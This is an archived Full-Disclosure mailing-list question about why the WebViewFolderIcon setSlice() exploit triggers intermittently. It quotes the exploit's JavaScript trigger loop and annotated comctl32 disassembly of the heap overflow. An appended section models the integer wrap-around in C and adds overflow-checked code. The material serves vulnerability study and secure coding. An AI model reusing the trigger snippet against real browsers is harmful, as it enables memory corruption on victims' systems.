Message-ID: <de6cc1fe0611230206j724ef456nfa3cdbe45e86ae74@mail.gmail.com>
Date: Thu, 23 Nov 2006 18:06:22 +0800
From: ". Solo" <soloaway@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Regarding WebViewFolderIcon setSlice() Exploit

Hi, all

Some questions puzzled me.

The exploit: http://www.milw0rm.com/exploits/2448

In the assembly code, it allocates 0 bytes first, and then we can tell it overflows
through the "rep movsd" in ".text:780AA731". In fact, it is required that
edi must be set to the place where we allocated 0 bytes, if we want to trigger
the vulnerability.

But most of the time it cannot be triggered.

I saw the exploit invokes setSlice repeatedly, yet sometimes it can be
triggered through the long "FOR" repeat. I cannot find the reason why it
can be triggered if we just repeat and repeat; what happens to make
edi point to the 0-byte allocation?

Thanks for your help

    for (i = 0; i < 128; i++)
    {
        try {
            var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
            tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505, 0x05050505);
        } catch (e) {}
    }

.text:780AA6F1                 mov     ecx, [ebx+10h]          ; ecx = 00000002
.text:780AA6F4                 add     eax, ecx                ; eax = 80000000
.text:780AA6F6                 cdq                             ; edx = FFFFFFFF
.text:780AA6F7                 idiv    ecx                     ; eax = C0000000 (edx = 00000000)
.text:780AA6F9                 mov     esi, eax                ; esi = C0000000
.text:780AA6FB                 mov     eax, [ebx+0Ch]          ; eax = 00000010 ([00eaeb34])
.text:780AA6FE                 imul    esi, ecx
.text:780AA701                 imul    eax, esi
.text:780AA704                 push    eax                     ; uBytes
.text:780AA705                 push    dword ptr [ebx+4]       ; hMem
.text:780AA708                 call    comctl32__ReAlloc       ; Alloc 0 Byte
.text:780AA70D                 test    eax, eax                ; eax is the pointer to the place of "0Byte"
.text:780AA70F                 jz      short loc_780AA73D
.text:780AA711                 mov     [ebx+4], eax
.text:780AA714                 mov     eax, [esp+0Ch+arg_4]    ; eax = 7fffffff
.text:780AA718                 mov     [ebx+8], esi            ; [ebx+8] = 80000000
.text:780AA71B
.text:780AA71B loc_780AA71B:                           ; CODE XREF: comctl32__DSA_SetItem+1D.j
.text:780AA71B                 mov     [ebx], edi              ; [ebx] = edi = 7fffffff
.text:780AA71D
.text:780AA71D loc_780AA71D:                           ; CODE XREF: comctl32__DSA_SetItem+15.j
.text:780AA71D                 mov     ecx, [ebx+0Ch]
.text:780AA720                 mov     esi, [esp+0Ch+arg_8]    ; esi = "DCBA", arg_8
.text:780AA724                 mov     edi, ecx
.text:780AA726                 imul    edi, eax
.text:780AA729                 add     edi, [ebx+4]
.text:780AA72C                 mov     eax, ecx
.text:780AA72E                 shr     ecx, 2
.text:780AA731                 rep movsd                       ; copy esi to edi, but edi is not always the place where we allocated 0 bytes.
.text:780AA733                 mov     ecx, eax
.text:780AA735                 and     ecx, 3
.text:780AA738                 xor     eax, eax
.text:780AA73A                 rep movsb
.text:780AA73C                 inc     eax
.text:780AA73D
.text:780AA73D loc_780AA73D:                           ; CODE XREF: comctl32__DSA_SetItem+3D.j
.text:780AA73D                 pop     edi
.text:780AA73E                 pop     esi
.text:780AA73F                 pop     ebx

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
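The annotated listing in the post shows why the ReAlloc call ends up requesting 0 bytes and why the rep movsd destination lands outside the buffer: every step of the size arithmetic is a 32-bit operation that silently wraps. The C model below is an added example, not code from the post and not comctl32 code; it reproduces that arithmetic with the values the annotations give (grow count 2, item size 0x10, index 0x7ffffffe for the growth step and 0x7fffffff for the copy; the base address 0x00100000 is constructed) and places an overflow-checked version beside it, which is what a reviewer would expect from a dynamic-array implementation. The `__builtin_add_overflow` / `__builtin_mul_overflow` calls are GCC/Clang builtins; the function names are this example's own.

```c
/* Model of the 32-bit size arithmetic in the DSA_SetItem listing above,
 * with an overflow-checked version beside it.  Constructed example: not
 * comctl32 code.  Inputs mirror the post's annotations (ecx = grow = 2,
 * [ebx+0Ch] = item_size = 0x10). */
#include <stdint.h>
#include <stdio.h>

/* New capacity exactly as the listing forms it: (index + grow) is divided
 * with cdq/idiv, i.e. as a SIGNED quantity, then multiplied back up. */
uint32_t unchecked_new_capacity(uint32_t index, uint32_t grow)
{
    uint32_t sum = index + grow;                 /* add eax, ecx  -> 0x80000000 */
    int32_t  q   = (int32_t)sum / (int32_t)grow; /* cdq; idiv ecx -> 0xC0000000 */
    return (uint32_t)q * grow;                   /* imul esi, ecx -> 0x80000000 */
}

/* Byte count pushed as uBytes: item_size * capacity wraps to zero. */
uint32_t unchecked_grow_bytes(uint32_t index, uint32_t grow, uint32_t item_size)
{
    return item_size * unchecked_new_capacity(index, grow); /* imul eax, esi -> 0 */
}

/* Copy destination as edi is formed before rep movsd: base + index * item_size.
 * 0x10 * 0x7fffffff wraps to 0xFFFFFFF0, so edi points 16 bytes BEFORE base. */
uint32_t unchecked_dest_addr(uint32_t base, uint32_t index, uint32_t item_size)
{
    return item_size * index + base;
}

/* Checked growth: same rounding, but each step that can wrap is tested.
 * Returns the byte count, or -1 when the request must be rejected. */
int64_t checked_grow_bytes(uint32_t index, uint32_t grow, uint32_t item_size)
{
    uint32_t sum, cap, bytes;
    if (grow == 0 || item_size == 0) return -1;
    if (__builtin_add_overflow(index, grow, &sum)) return -1;
    cap = sum - sum % grow;          /* round down to a multiple of grow, unsigned */
    if (cap <= index) return -1;     /* the new slot must fit in the new capacity */
    if (__builtin_mul_overflow(cap, item_size, &bytes)) return -1;
    return (int64_t)bytes;
}

/* Checked item offset: rejects an index beyond capacity or a wrapping multiply,
 * so the copy can never be aimed outside the allocation. */
int64_t checked_item_offset(uint32_t index, uint32_t capacity, uint32_t item_size)
{
    uint32_t off;
    if (index >= capacity) return -1;
    if (__builtin_mul_overflow(index, item_size, &off)) return -1;
    return (int64_t)off;
}

int main(void)
{
    const uint32_t grow = 2, item = 0x10, base = 0x00100000u; /* constructed base */
    printf("unchecked: capacity=%08x uBytes=%08x dest=%08x (base=%08x)\n",
           unchecked_new_capacity(0x7ffffffeu, grow),
           unchecked_grow_bytes(0x7ffffffeu, grow, item),
           unchecked_dest_addr(base, 0x7fffffffu, item), base);
    printf("checked:   index 0x7ffffffe -> %lld, index 5 -> %lld bytes\n",
           (long long)checked_grow_bytes(0x7ffffffeu, grow, item),
           (long long)checked_grow_bytes(5u, grow, item));
    return 0;
}
```

Build with `gcc -O0 -Wall` or clang; the unchecked functions rely on unsigned wrap-around and on the GCC/Clang modular conversion of 0x80000000 to int32_t, which is exactly the cdq/idiv behaviour being modelled. The checked variants show the two independent conditions a fix needs: the allocation size must not wrap, and the index used for the write must be validated against the capacity that was actually allocated rather than against the wrapped value stored in [ebx+8].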
